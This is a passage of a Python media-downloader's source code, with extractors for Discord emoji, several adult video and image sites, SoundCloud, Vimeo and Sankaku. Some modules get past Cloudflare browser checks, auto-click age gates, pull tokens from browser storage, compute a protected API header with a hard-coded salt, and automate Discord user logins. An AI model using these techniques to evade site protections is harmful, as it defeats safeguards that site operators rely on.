""" from utils import Downloader, clean_title import requests import errors class DownloaderDiscordEmoji(Downloader): type = "discord" def init(self): pass def read(self): token_guild_id_list = self.url.split( "/" ) # 값을 어떻게 받을지 몰라서 일단 나눴어요. discord_이메일/비밀번호/서버아이디 또는 discord_토큰/서버아이디 이런식으로 받게 해놨어요. if len(token_guild_id_list) == 2: token = token_guild_id_list[0] guild_id = token_guild_id_list[1] elif len(token_guild_id_list) == 3: email = token_guild_id_list[0] password = token_guild_id_list[1] guild_id = token_guild_id_list[2] response = self.post_account_info(email, password) account_info = response.json() if response.status_code == 400: if account_info.get("captcha_key"): raise errors.Invalid( "먼저 웹 또는 디스코드 앱에서 로그인하신후 캡차를 인증해주세요." ) # 메세지 박스 return하니까 멈춰서 raise로 해놨어요 else: raise errors.Invalid("이메일 또는 비밀번호가 잘못되었습니다. 확인후 다시 시도해주세요.") else: if not account_info["token"]: raise errors.Invalid("토큰을 받아오지 못했어요. 2단계인증을 사용중이신경우 토큰을 이용해 요청해주세요.") else: token = account_info["token"] else: raise errors.Invalid("인자값이 더 많이왔어요.") guild_info_response = self.get_emoji_list(token, int(guild_id)) # 토큰과 함께 get요청함 if guild_info_response.status_code != 200: raise errors.Invalid("정상적인 토큰이 아니거나 서버를 찾을수없어요. 맞는 토큰인지, 해당 서버에 접속해있는지 확인해주세요.") else: guild_info = guild_info_response.json() if guild_info["emojis"]: base_url = "https://cdn.discordapp.com/emojis/" for emoji in guild_info["emojis"]: # 이모지 리스트로 가져옴 if emoji["animated"] is True: # 만약 gif면 gif 다운로드 param = emoji["id"] + ".gif" else: # 아닐경우 png로 param = emoji["id"] + ".png" self.title = clean_title( f'{guild_info["name"]}({guild_info["id"]})' # 폴더 이름은 서버 이름, id ) self.urls.append(base_url + param + "?v=1") # 인자 합치기 else: raise errors.Invalid("해당 서버에는 이모지가 없어요") def get_emoji_list(self, token: str, guild_id: int) -> dict: response = requests.get( f"https://discordapp.com/api/v6/guilds/{guild_id}", headers={"Authorization": token}, ) if response.status_code == 401: response = requests.get( f"https://discordapp.com/api/v6/guilds/{guild_id}", headers={"Authorization": f"Bot {token}"}, ) return response def post_account_info(self, email: str, password: str) -> dict: response = requests.post( "https://discordapp.com/api/v8/auth/login", json={ "email": email, "password": password, "undelete": False, "captcha_key": None, "login_source": None, "gift_code_sku_id": None, }, ) return response File: src/extractor/xhamster_downloader.py import downloader, ree as re from utils import Downloader, Session, LazyUrl, get_print, get_ext, try_n, format_filename, clean_title, get_resolution from translator import tr_ from io import BytesIO import ytdl class Downloader_xhamster(Downloader): type = 'xhamster' __name = r'([^/]*\.)?(xhamster|xhwebsite|xhofficial|xhlocal|xhopen|xhtotal|megaxh|xhwide|xhtab|xhtime)([0-9]*)' #3881, #4332, #4826, #5029, #5696, #5893 URLS = [rf'regex:{__name}\.[a-z0-9]+/(videos|users|creators|photos/gallery)/'] single = True display_name = 'xHamster' ACCEPT_COOKIES = __name def init(self): if re.search(r'xhamsterlive[0-9]*\.', self.url): raise Exception('xHamsterLive') if not re.search(r'{}\.'.format(self.__name), self.url): self.url = 'https://xhamster.com/videos/{}'.format(self.url) self.session = Session('chrome') @classmethod def fix_url(cls, url): url = re.sub(r'(/users/[^/]+/videos)/[0-9]+', r'\1', url, 1) #5029 return url @classmethod def key_id(cls, url): return re.sub(cls.__name+r'\.[^/]+', 'domain', url, 1).replace('http://', 'https://') def read(self): cw = self.cw self.enableSegment(1024*1024//2) thumb = BytesIO() if '/users/' in self.url or 
'/creators/' in self.url: #6257 info = read_channel(self.url, self.session, cw) urls = info['urls'] videos = [Video(url) for url in urls] video = self.process_playlist(info['title'], videos) elif '/photos/gallery/' in self.url: info = read_gallery(self.url, self.session, cw) for img in info['imgs']: self.urls.append(img.url) self.single = False self.title = clean_title(info['title']) self.url = info['url'] self.disableSegment() return else: video = Video(self.url) video.url() self.urls.append(video.url) self.title = video.title downloader.download(video.info['thumbnail'], buffer=thumb) self.setIcon(thumb) class Video: _url = None def __init__(self, url): #url = downloader.real_url(url) self.url = LazyUrl(url, self.get, self) @try_n(2) def get(self, url): if self._url is None: self.info = get_info(url) self.title = self.info['title'] id = self.info['id'] #4773 fs = self.info['formats'] res = max(get_resolution(), min(f['height'] for f in fs)) fs = [f for f in fs if f['height'] <= res] video_best = fs[-1] self._url = video_best['url'] ext = get_ext(self._url) self.filename = format_filename(self.title, id, ext) if isinstance(self._url, str) and 'referer=force' in self._url.lower(): self._referer = self._url else: self._referer = url return self._url, self._referer def get_info(url): #6318 info = {} ydl = ytdl.YoutubeDL() d = ydl.extract_info(url) info['title'] = d['title'] info['id'] = d['id'] info['thumbnail'] = d['thumbnail'] fs = [] for f in d['formats']: if f['protocol'] != 'https': continue f = {'url': f['url'], 'height': f['height']} fs.append(f) fs = sorted(fs, key=lambda f: f['height']) info['formats'] = fs return info def read_page(type_, username, p, session, cw): print_ = get_print(cw) if type_ == 'users': url = f'https://xhamster.com/users/{username}/videos/{p}' elif type_ == 'creators': url = f'https://xhamster.com/creators/{username}/exclusive/{p}' else: raise NotImplementedError(type_) print_(url) n = 4 for try_ in range(n): try: soup = downloader.read_soup(url, session=session) items = soup.findAll('div', class_='thumb-list__item') if not items and try_ < n-1: continue break except Exception as e: e_ = e print(e) else: if p == 1: raise e_ else: return [] return items def read_channel(url, session, cw=None): type_, username = re.find(r'/(users|creators)/([^/]+)', url, err='no username') info = {} soup = downloader.read_soup(url, session=session) title = (soup.find('div', class_='user-name') or soup.find('h1')).text.strip() info['title'] = '[Channel] {}'.format(title) urls = [] urls_set = set() for p in range(1, 101): items = read_page(type_, username, p, session, cw) if not items: print('no items') break for item in items: if item.find('span', class_='thumb-image-container__status-text'): #2858 continue url = item.a.attrs['href'] if url in urls_set: print('duplicate:', url) continue urls_set.add(url) urls.append(url) s = '{} {} - {}'.format(tr_('읽는 중...'), info['title'], len(urls)) if cw: cw.setTitle(s) else: print(s) info['urls'] = urls return info class Image: def __init__(self, url, id, referer): self.id = id self._url = url self.url = LazyUrl(referer, self.get, self) def get(self, referer): url = self._url ext = get_ext(url) self.filename = '{}{}'.format(self.id, ext) return url def setPage(url, p): url = url.strip('/') c = url.split('/photos/gallery/')[1].count('/') if c: url = '/'.join(url.split('/')[:-1]) if p > 1: url += '/{}'.format(p) return url def read_gallery(url, session, cw=None): print_ = get_print(cw) info = {} soup = downloader.read_soup(url, session=session) 
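# --- Illustrative sketch (not part of this module) ---------------------------
# The loop below walks gallery pages with setPage(), collects photo ids, skips
# duplicates and stops on the first empty page. The same pattern, reduced to a
# self-contained sketch over synthetic data (fake_pages stands in for the
# per-page scrape; the names and sample ids are made up for illustration):
fake_pages = [['a', 'b'], ['b', 'c'], []]  # photo ids per page; the empty page ends the walk

seen, ordered = set(), []
for page_items in fake_pages:
    if not page_items:        # empty page -> no more photos
        break
    for pid in page_items:
        if pid in seen:       # same photo repeated on a later page
            continue
        seen.add(pid)
        ordered.append(pid)
assert ordered == ['a', 'b', 'c']
# -----------------------------------------------------------------------------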
h1 = soup.find('h1') if h1.find('a'): url = h1.find('a')['href'] return read_gallery(url, session, cw) info['title'] = h1.text.strip() info['url'] = setPage(url, 1) imgs = [] ids = set() for p in range(1, 101): print_('p: {}'.format(p)) url = setPage(url, p) soup = downloader.read_soup(url, session=session) view = soup.find('div', id='photo-slider') photos = view.findAll('a', id=lambda id: id and id.startswith('photo-')) if not photos: print_('no photos') break for photo in photos: img = photo['href'] id = photo['id'].split('photo-')[1] referer = url if id in ids: print('duplicate:', id) continue ids.add(id) img = Image(img, id, referer) imgs.append(img) info['imgs'] = imgs return info File: src/extractor/nhentai_com_downloader.py #coding:utf8 import downloader import ree as re from utils import urljoin, LazyUrl, Downloader, try_n, join, json import os class Downloader_nhentai_com(Downloader): type = 'nhentai_com' URLS = [r'regex:https?://nhentai.com'] MAX_CORE = 16 display_name = 'nhentai.com' ACCEPT_COOKIES = [r'(.*\.)?nhentai\.com'] def init(self): self.info = get_info(self.url) self.url = self.info['url'] @classmethod def key_id(cls, url): url = url.lower() return re.find(r'/comic/([^/?]+)', url) or url def read(self): info = self.info artist = join(info['artists']) self.artist = artist if info['artists'] else None group = join(info['groups']) lang = info['lang'] or 'N/A' series = info['seriess'][0] if info['seriess'] else 'N/A' title = self.format_title(info['type'], info['id'], info['title'], artist, group, series, lang) for img in info['imgs']: self.urls.append(img.url) self.title = title @LazyUrl.register class LazyUrl_nhentai_com(LazyUrl): type = 'nhentai_com' def dump(self): referer = self._url url = self.image.url_img return { 'referer': referer, 'url': url, 'p': self.image.p, } @classmethod def load(cls, data): referer = data['referer'] url = data['url'] img = Image(referer, url, data['p']) return img.url class Image: def __init__(self, url_page, url_img, p): self.p = p self.referer = url_page self.filename = os.path.basename(url_img) self.url_img = url_img self.url = LazyUrl_nhentai_com(url_page, lambda _: self.url_img, self) @try_n(4) def get_info(url): url = downloader.real_url(url) q = re.find(r'/comic/([^/?]+)', url) url_api = 'https://nhentai.com/api/comics/{}'.format(q) data_raw = downloader.read_html(url_api, url) data = json.loads(data_raw) url_api = 'https://nhentai.com/api/comics/{}/images'.format(q) data_raw = downloader.read_html(url_api, url) data_images = json.loads(data_raw) info = {} info['url'] = url info['id'] = int(data['id']) info['type'] = data['category']['name'] info['title'] = data['title'] info['artists'] = [x['name'] for x in data['artists']] info['groups'] = [x['name'] for x in data['groups']] info['seriess'] = [x['name'] for x in data['parodies']] info['lang'] = data['language']['name'] imgs = [] for img in data_images['images']: img = urljoin(url, img['source_url']) img = Image(url, img, len(imgs)) imgs.append(img) info['imgs'] = imgs return info File: src/extractor/xvideo_downloader.py import downloader from utils import Downloader, Soup, LazyUrl, urljoin, format_filename, Session, get_ext, get_print, get_max_range, html_unescape, try_n, limits, json from io import BytesIO import ree as re from m3u8_tools import playlist2stream from translator import tr_ from timee import sleep CHANNEL_PATTERN = r'/(profiles|[^/]*channels)/([0-9a-zA-Z_-]+)' def get_id(url): url = url.lower() if '/prof-video-click/' in url: return 
url.split('/prof-video-click/')[1].split('/')[2] return re.find(r'xvideos[0-9]*\.[^/]+/video([0-9]+)', url, err='no id') class Video: _url = None def __init__(self, url_page): url_page = Downloader_xvideo.fix_url(url_page) self.url = LazyUrl(url_page, self.get, self) def get(self, url_page): if not self._url: self._get(url_page) return self._url @try_n(4) @limits(2) def _get(self, url_page): id = get_id(url_page) html = downloader.read_html(url_page) soup = Soup(html) self.title = html_unescape(soup.find('title').text).replace('- XVIDEOS.COM', '').strip() url = re.find(r'''.setVideoHLS\(['"](.+?)['"]\)''', html) or re.find(r'''.setVideoUrlHigh\(['"](.+?)['"]\)''', html) or re.find(r'''.setVideoUrlLow\(['"](.+?)['"]\)''', html) #https://www.xvideos.com/video65390539/party_night if not url: raise Exception('no video url') ext = get_ext(url) if ext.lower() == '.m3u8': url = playlist2stream(url, n_thread=5) #4773 self.url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'] self.filename = format_filename(self.title, id, '.mp4') self._url= url @property def thumb(self): self.url() f = BytesIO() downloader.download(self.url_thumb, buffer=f) return f class Downloader_xvideo(Downloader): type = 'xvideo' URLS = [r'regex:[./]xvideos[0-9]*\.(com|in|es)'] single = True display_name = 'XVideos' ACCEPT_COOKIES = [r'(.*\.)?xvideos[0-9]*\.(com|in|es)'] def init(self): if 'xvideos.' in self.url.lower(): self.url = self.url.replace('http://', 'https://') else: self.url = 'https://www.xvideos.com/{}'.format(self.url) @classmethod def fix_url(cls, url): url = re.sub(r'[^/]*xvideos[0-9]*\.[^/]+', 'www.xvideos.com', url).replace('http://', 'https://') url = url.replace('/THUMBNUM/', '/') return url @classmethod def key_id(cls, url): res = re.find(CHANNEL_PATTERN, url) if res: return '_'.join(res) return url def read(self): res = re.find(CHANNEL_PATTERN, self.url) if res: header, username = res info = read_channel(self.url, self.cw) videos = [Video(url) for url in info['urls']] video = self.process_playlist('[Channel] {}'.format(info['name']), videos) else: video = Video(self.url) video.url() self.title = video.title self.urls.append(video.url) self.setIcon(video.thumb) def read_channel(url_page, cw=None): print_ = get_print(cw) res = re.find(CHANNEL_PATTERN, url_page) if res is None: raise Exception('Not channel') header, username = res print(header, username) max_pid = get_max_range(cw) info = {} info['header'] = header info['username'] = username session = Session() urls = [] ids = set() for p in range(100): url_api = urljoin(url_page, '/{}/{}/videos/best/{}'.format(header, username, p)) print_(url_api) r = session.post(url_api) data = json.loads(r.text) videos = data.get('videos') #4530 if not videos: print_('empty') break for video in videos: id_ = video['id'] if id_ in ids: print_('duplicate: {}'.format(id_)) continue ids.add(id_) info['name'] = video['pn'] urls.append(urljoin(url_page, video['u'])) if len(urls) >= max_pid: break n = data['nb_videos'] s = '{} {} - {}'.format(tr_('읽는 중...'), info['name'], len(urls)) if cw: cw.setTitle(s) else: print(s) if len(ids) >= n: break sleep(1, cw) if not urls: raise Exception('no videos') info['urls'] = urls[:max_pid] return info File: src/extractor/mrm_downloader.py #coding:utf8 from utils import Soup, urljoin, LazyUrl, Downloader, try_n, get_print, clean_title, get_ext, check_alive from translator import tr_ import ree as re import clf2# class Image: def __init__(self, url, p, page, cw): self.cw = cw ext = get_ext(url) self.filename = 
'{:04}{}'.format(p, ext) if page.title is not None: self.filename = '{}/{}'.format(page.title, self.filename) self._url = url self.url = LazyUrl(page.url, self.get, self) def get(self, _): return self._url#'tmp://' + clf2.download(self._url, cw=self.cw) class Page: def __init__(self, title, url, soup=None): self.title = clean_title(title) self.url = url self.soup = soup class Downloader_mrm(Downloader): type = 'mrm' URLS = ['myreadingmanga.info'] _soup = None MAX_CORE = 4 display_name = 'MyReadingManga' ACCEPT_COOKIES = [r'(.*\.)?myreadingmanga\.info'] def init(self): self.session = get_session(self.url, self.cw) @classmethod def fix_url(cls, url): return re.find('https?://myreadingmanga.info/[^/]+', url, err='err') @property def soup(self): if self._soup is None: for try_ in range(8): try: html = read_html(self.url, session=self.session, cw=self.cw) break except Exception as e: e_ = e self.print_(e) else: raise e_ self._soup = Soup(html) return self._soup @property def name(self): title = get_title(self.soup) return title def read(self): self.title = '읽는 중... {}'.format(self.name) imgs = get_imgs(self.url, self.soup, self.session, self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name def get_title(soup): title = soup.find('h1', class_='entry-title').text.strip() title = fix_title(title) title = clean_title(title) return title def get_imgs(url, soup=None, session=None, cw=None): if soup is None: html = read_html(url, session=session, cw=cw) soup = Soup(html) title = get_title(soup) pagination = soup.find('div', class_='pagination') if pagination is None: page = Page(None, url, soup) imgs = get_imgs_page(page, session=session, cw=cw) else: pages = get_pages(url, soup, session=session) imgs = [] for i, page in enumerate(pages): check_alive(cw) s = '{} {} / {} ({} / {})'.format(tr_('읽는 중...'), title, page.title, i+1, len(pages)) if cw: cw.setTitle(s) else: print(s) imgs += get_imgs_page(page, session=session, cw=cw) if not imgs: raise Exception('no imgs') return imgs def get_pages(url, soup=None, session=None): if soup is None: html = read_html(url, session=session, cw=None) soup = Soup(html) pagination = soup.find('div', class_='pagination') pages = [] hrefs = set() for a in pagination.findAll('a'): href = a.attrs.get('href', '') href = urljoin(url, href) if not href.startswith(url): print('not match', href) continue while href.endswith('/'): href = href[:-1] if href in hrefs: print('duplicate', href) continue hrefs.add(href) text = a.text.strip() page = Page(text, href) pages.append(page) if url not in hrefs: page = Page('1', url, soup) pages.insert(0, page) return pages @try_n(4) def get_imgs_page(page, session=None, cw=None): url = page.url soup = page.soup if soup is None: html = read_html(url, session=session, cw=None) soup = Soup(html) page.soup = soup view = soup.find('div', class_='entry-content') imgs = [] for img in view.findAll('img'): img = img.attrs.get('data-lazy-src') or img.attrs.get('data-src') if img is None: continue img = urljoin(url, img) img = Image(img, len(imgs), page, cw) imgs.append(img) print(page.title, len(imgs), page.url) return imgs def fix_title(title): title = re.sub(r'\(?[^()]*?c\.[^() ]+\)?', '', title) while ' ' in title: title = title.replace(' ', ' ') return title def read_html(url, session, cw): ## html = downloader.read_html(url, session=session) ## soup = Soup(html) ## ## cf = soup.find('div', class_='cf-browser-verification') ## if cf is None: ## return html r = clf2.solve(url, cw=cw, session=session) return r['html'] @try_n(4) 
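# Note: read_html() above and get_session() below both route through
# clf2.solve(), which drives an embedded browser to get past the site's
# Cloudflare check ("cf protection") and hands back the solved HTML and a
# cookie-carrying session; try_n simply retries the whole attempt a few times
# if the challenge fails.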
def get_session(url, cw=None): print_ = get_print(cw) ## html = downloader.read_html(url) ## soup = Soup(html) ## ## cf = soup.find('div', class_='cf-browser-verification') ## if cf is None: ## print_('no cf protection') ## return None print_('cf protection') r = clf2.solve(url, cw=cw) session = r['session'] return session File: src/extractor/iwara_downloader.py import downloader from utils import Soup, urljoin, Downloader, LazyUrl, get_print, clean_url, clean_title, check_alive, Session, try_n, format_filename, tr_, get_ext, print_error, get_max_range import ree as re import errors import clf2 import hashlib import urllib from io import BytesIO from timee import time TIMEOUT = 300 PATTERN_ID = r'(image|video)/([0-9a-zA-Z_-]+)' class Downloader_iwara(Downloader): type = 'iwara' URLS = ['iwara.tv'] MAX_CORE = 16# single = True display_name = 'Iwara' ACCEPT_COOKIES = [r'(.*\.)?iwara\.tv'] @classmethod def fix_url(cls, url): url = clean_url(url) return url.split('?')[0] def init(self): self.session = Session() self.setTimeout(TIMEOUT) def read(self): info = get_info(self.url, self.session, self.cw) if info is None: return # embeded self.title = clean_title(info['title']) videos = info['files'] self.single = len(videos) < 2 # first video must be valid while videos: video = videos[0] try: video.url() break except Exception as e: e_ = e self.print_(print_error(e)) videos.remove(video) else: raise e_ if info.get('playlist', False): video = self.process_playlist(info['title'], videos) else: #6031 self.urls += [file.url for file in videos] self.enableSegment() url_thumb = video.url_thumb self.print_(f'url_thumb: {url_thumb}') if url_thumb: f = BytesIO() downloader.download(url_thumb, buffer=f, session=self.session, customWidget=self.cw) f.seek(0) self.setIcon(f) username = info.get('username') if username: self.artist = username class File: def __init__(self, type, url, referer, info, session, multi_post=False): title = info['title'] p = len(info['files']) self.url = LazyUrl(referer, lambda _: url, self) ext = get_ext(url) or downloader.get_ext(url, session=session) if type == 'video': id_ = re.find(PATTERN_ID, referer, err='no video id')[1] self.filename = format_filename(title, id_, ext) #4287 else: name = '{}_p{}'.format(clean_title(title), p) if multi_post else p self.filename = '{}{}'.format(name, ext) self.url_thumb = info.get('url_thumb') class LazyFile: def __init__(self, url, session, cw): self.session = session self.cw = cw self.url = LazyUrl(url, self.get, self) def get(self, url): info = get_info(url, self.session, self.cw) file = info['files'][0] self.filename = file.filename self.url_thumb = file.url_thumb return file.url() def get_token(session, cw=None): token = None def f(html, browser=None): def callback(r): nonlocal token token = r browser.runJavaScript('window.localStorage.getItem("token")', callback=callback) return bool(token) clf2.solve('https://iwara.tv', session=session, cw=cw, f=f, timeout=15) #print_(f'token: {token}') r = session.post('https://api.iwara.tv/user/token', headers={'Authorization': f'Bearer {token}'}) d = r.json() token = d['accessToken'] #print_(f'token2: {token}') return token @try_n(2) def get_info(url, session, cw, multi_post=False): print_ = get_print(cw) t0 = None def f(html, browser=None): nonlocal t0 soup = Soup(html) if t0 is None: t0 = time() if time() - t0 > 10 or '/profile/' in url.lower(): for a in soup.findAll('a'): if urljoin(url, a.get('href', '')) == urljoin(url, '/login'): raise errors.LoginRequired(method='browser', 
url='https://www.iwara.tv/login', cookie=False, w=1460) #5794 buttons = soup.findAll(class_='button--primary') if buttons: for i, button in enumerate(buttons): button_text = button.text if not button_text: continue print_(f'button: {button_text}') if button_text.lower() in ['i am over 18', 'continue']: browser.runJavaScript(f'btns=document.getElementsByClassName("button--primary");btns[{i}].click();') #5794#issuecomment-1517879513 if '/profile/' in url.lower(): return soup.find('div', class_='page-profile__header') is not None else: details = soup.find('div', class_='page-video__details') if details and not soup.find('div', class_='vjs-poster') and not soup.find(class_='embedPlayer__youtube'): #6737, #6836 print_('no poster') return False details = details or soup.find('div', class_='page-image__details') return details is not None and details.find('div', class_='text--h1') is not None html = clf2.solve(url, session=session, f=f, cw=cw, timeout=30)['html'] #5794 soup = Soup(html) info = {} info['files'] = [] type = url.split('/')[3] if type == 'profile': max_pid = get_max_range(cw) ids = set() sub = (url+'/').split('/')[5] if not sub: sub = 'videos' uid = url.split('/')[4] url_api = f'https://api.iwara.tv/profile/{uid}' j = downloader.read_json(url_api, session=session) info['username'] = username = j['user']['name'] info['id'] = id = j['user']['username'] info['title'] = f'[Channel] [{sub.capitalize()}] {username} ({id})' id = j['user']['id'] if sub == 'videos': info['playlist'] = True for p in range(100): url_api = f'https://api.iwara.tv/videos?page={p}&sort=date&user={id}' j = downloader.read_json(url_api, session=session) for post in j['results']: id_ = post['id'] if id_ in ids: continue ids.add(id_) slug = post['slug'] url_post = f'https://www.iwara.tv/video/{id_}/{slug}' file = LazyFile(url_post, session, cw) info['files'].append(file) if cw: cw.setTitle(tr_('읽는 중... {} ({} / {})').format(info['title'], len(ids), j['count'])) if len(info['files']) >= max_pid: break if j['limit']*(p+1) >= j['count']: break elif sub == 'images': for p in range(100): url_api = f'https://api.iwara.tv/images?page={p}&sort=date&user={id}' j = downloader.read_json(url_api, session=session) for post in j['results']: check_alive(cw) id_ = post['id'] if id_ in ids: continue ids.add(id_) slug = post['slug'] url_post = f'https://www.iwara.tv/image/{id_}/{slug}' info_post = get_info(url_post, session, cw, True) info['files'] += info_post['files'] print_(f'imgs: {len(info["files"])}') if cw: cw.setTitle(tr_('읽는 중... 
{} ({} / {})').format(info['title'], len(ids), j['count'])) if len(info['files']) >= max_pid: break if len(info['files']) >= max_pid: break if j['limit']*(p+1) >= j['count']: break else: raise NotImplementedError(f'profile: {sub}') return info details = soup.find('div', class_='page-video__details') or soup.find('div', class_='page-image__details') info['title'] = details.find('div', class_='text--h1').text.strip() info['username'] = soup.find('a', class_='username')['title'] soup.find('div', class_='videoPlayer') or soup.find('div', class_='page-image__slideshow') id = re.find(PATTERN_ID, url, err='no id')[1] try: token = get_token(session, cw=cw) except Exception as e: print_(print_error(e)) token = None url_api = f'https://api.iwara.tv/{type}/{id}' hdr = {} if token: hdr['authorization'] = f'Bearer {token}' data = downloader.read_json(url_api, url, session=session, headers=hdr) if data.get('embedUrl'): if cw and not cw.downloader.single: raise errors.Invalid('[iwara] Embeded: {}'.format(data['embedUrl'])) #5869 cw.downloader.pass_() cw.gal_num = cw.url = data['embedUrl'] d = Downloader.get('youtube')(data['embedUrl'], cw, cw.downloader.thread, 1) d.start() return if not data.get('files'): data['files'] = [data['file']] for file in data['files']: id_ = file['id'] if type == 'video': fileurl = data['fileUrl'] up = urllib.parse.urlparse(fileurl) q = urllib.parse.parse_qs(up.query) paths = up.path.rstrip('/').split('/') x_version = hashlib.sha1('_'.join((paths[-1], q['expires'][0], '5nFp9kmbNnHdAFhaqMvt')).encode()).hexdigest() # https://github.com/yt-dlp/yt-dlp/issues/6549#issuecomment-1473771047 j = downloader.read_json(fileurl, url, session=session, headers={'X-Version': x_version}) def key(x): if x['name'].lower() == 'source': return float('inf') try: return float(x['name']) except: return -1 x = sorted(j, key=key)[-1] print_(f'name: {x["name"]}') url_file = urljoin(url, x['src']['view']) poster = soup.find('div', class_='vjs-poster')['style'] info['url_thumb'] = urljoin(url, re.find(r'url\("(.+?)"', poster, err='no poster')) else: name = file['name'] url_file = f'https://i.iwara.tv/image/original/{id_}/{name}' if len(data['files']) == 1: multi_post = True# file = File(type, url_file, url, info, session, multi_post) info['files'].append(file) return info File: src/extractor/soundcloud_downloader.py #coding: utf8 import downloader from io import BytesIO from utils import Downloader, LazyUrl, get_print, try_n, lock, get_max_range, format_filename, limits import ffmpeg import ytdl from m3u8_tools import M3u8_stream CLIENT_ID = None @lock def get_cid(force=False): global CLIENT_ID if CLIENT_ID is None or force: print('update cid...') d = ytdl.YoutubeDL() e = ytdl.extractor.soundcloud.SoundcloudIE(d) e._update_client_id() CLIENT_ID = e._CLIENT_ID return CLIENT_ID class Audio: _url = None def __init__(self, url, album_art, cw=None): self.album_art = album_art self.cw = cw self.url = LazyUrl(url, self.get, self, pp=self.pp) @try_n(2) @limits(1) def get(self, url): print_ = get_print(self.cw) if self._url: return self._url ydl = ytdl.YoutubeDL() self.info = info = ydl.extract_info(url) formats = info['formats'] print(formats) def key(f): abr = f.get('abr') if abr is None: abr = 320 return int(abr) formats = sorted(formats, key=key, reverse=True) url_audio = None for format in formats: protocol = format['protocol'] print_('【{}】 format【{}】 abr【{}】'.format(protocol, format['format'], format.get('abr', 0))) if not url_audio and protocol in ['http', 'https']: url_audio = format['url'] if not 
url_audio: url_audio = M3u8_stream(formats[0]['url']) self.album_art = False# self.username = info['uploader'] self.title = '{} - {}'.format(self.username, info['title']) self.filename = format_filename(self.title, '', '.mp3') self._thumb = None def thumb(): if self._thumb is None: for t in info['thumbnails'][::-1]: width = t.get('width', 1080) if not 100 <= width <= 500: continue url_thumb = t['url'] f = BytesIO() try: downloader.download(url_thumb, buffer=f) break except Exception as e: print(e) f = None self._thumb = f else: f = self._thumb if f is not None: f.seek(0) return f self.thumb = thumb self._url = url_audio return self._url def pp(self, filename): if self.thumb() and self.album_art: ffmpeg.add_cover(filename, self.thumb(), {'artist':self.username, 'title':self.info['title']}, cw=self.cw) class Downloader_soundcloud(Downloader): type = 'soundcloud' single = True URLS = ['soundcloud.com'] #lock = True audio = None display_name = 'SoundCloud' ACCEPT_COOKIES = [r'(.*\.)?soundcloud\.com'] def init(self): if 'soundcloud.com' in self.url.lower(): self.url = self.url.replace('http://', 'https://') else: self.url = 'https://soundcloud.com/{}'.format(self.url) @classmethod def fix_url(cls, url): return url.split('?')[0] def read(self): album_art = self.ui_setting.albumArt.isChecked() info = get_audios(self.url, self.cw, album_art) audios = info['audios'] if not audios: raise Exception('no audios') # first audio must be valid while audios: audio = audios[0] try: audio.url() break except Exception as e: e_ = e print(e) audios.remove(audio) else: raise e_ if len(audios) > 1: audio = self.process_playlist(info['title'], audios) else: self.urls.append(audio.url) self.title = audio.title self.artist = audio.username self.setIcon(audio.thumb()) @try_n(2) def get_audios(url, cw, album_art): print_ = get_print(cw) url = url.rstrip('/') if url.count('/') == 3: url += '/tracks' options = { 'extract_flat': True, 'playlistend': get_max_range(cw), } ydl = ytdl.YoutubeDL(options, cw=cw) info = ydl.extract_info(url) if 'entries' in info: entries = info['entries'] title = info['title'] for _type in ['All', 'Tracks', 'Albums', 'Sets', 'Reposts', 'Likes', 'Spotlight']: x = '({})'.format(_type) if x in title: title = title.replace(x, '') kind = _type break else: kind = 'Playlist' print_('kind: {}'.format(kind)) info['title'] = '[{}] {}'.format(kind.capitalize(), title) else: entries = [info] audios = [] for e in entries: url = e.get('webpage_url') or e['url'] if '/sets/' in url: continue audio = Audio(url, album_art, cw=cw) audios.append(audio) info['audios'] = audios return info File: src/extractor/vimeo_downloader.py import downloader from io import BytesIO as IO from utils import Downloader, LazyUrl, get_ext, format_filename, try_n import ytdl class Downloader_vimeo(Downloader): type = 'vimeo' URLS = ['vimeo.com'] single = True ACCEPT_COOKIES = [r'(.*\.)?vimeo\.com'] def init(self): if 'vimeo.com' not in self.url.lower(): self.url = 'https://vimeo.com/{}'.format(self.url) def read(self): video = Video(self.url, cw=self.cw) video.url()# self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self) self.cw = cw @try_n(4) def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) fs = [f for f in info['formats'] if f['protocol'] in ['http', 'https']] fs = sorted(fs, key=lambda f: int(f.get('width', 0)), reverse=True) 
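# --- Illustrative sketch (not part of this module) ---------------------------
# The surrounding vimeo code simply takes the widest direct-HTTP format; several
# extractors above (twitch, xhamster, hanime) additionally cap the choice at the
# user's preferred resolution: keep only plain http(s) formats, take the largest
# one under the cap, and fall back to the smallest available otherwise. A
# self-contained sketch of that rule (the sample format dicts and the 720 cap
# are made up):
_formats = [
    {'protocol': 'https', 'height': 360},
    {'protocol': 'https', 'height': 720},
    {'protocol': 'm3u8', 'height': 1080},   # dropped: not plain http(s)
    {'protocol': 'https', 'height': 1080},
]
_cap = 720
_fs = sorted(
    (f for f in _formats if f['protocol'] in ('http', 'https')),
    key=lambda f: f['height'],
)
_under = [f for f in _fs if f['height'] <= _cap]
_best = (_under or _fs[:1])[-1]   # largest under the cap, else smallest overall
assert _best['height'] == 720
# -----------------------------------------------------------------------------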
        if not fs:
            raise Exception('No MP4 videos')
        f = fs[0]

        self.thumb_url = info['thumbnails'][0]['url']
        self.thumb = IO()
        downloader.download(self.thumb_url, buffer=self.thumb)

        self.title = info['title']
        url_video = f['url']
        ext = get_ext(url) or '.mp4'
        self.filename = format_filename(self.title, info['id'], ext)
        self._url = url_video
        return self._url


File: src/extractor/sankaku_downloader.py

#coding: utf-8
#https://chan.sankakucomplex.com/
#https://idol.sankakucomplex.com/
#https://beta.sankakucomplex.com/
#https://sankaku.app/
#http://white.sankakucomplex.com/
#https://www.sankakucomplex.com/
import downloader
import ree as re
from utils import Downloader, urljoin, query_url, get_max_range, get_print, Soup, lazy, Session, clean_title, check_alive, File, get_ext, limits, clean_url
from translator import tr_
import os
from timee import sleep
from error_printer import print_error
from urllib.parse import quote
import errors
import utils


class File_sankaku(File):
    type = 'sankaku'
    format = 'id'

    def get(self):
        print_ = get_print(self.cw)
        referer = self['referer']
        for try_ in range(4):
            wait(self.cw)
            html = ''
            try:
                html = downloader.read_html(referer, session=self.session)
                soup = Soup(html)
                highres = soup.find(id='highres')
                url = urljoin(referer, highres['href'] if highres else soup.find(id='image')['src'])
                break
            except Exception as e:
                e_msg = print_error(e)
                if '429 Too many requests'.lower() in html.lower():
                    t_sleep = 120 * min(try_ + 1, 2)
                    e = '429 Too many requests... wait {} secs'.format(t_sleep)
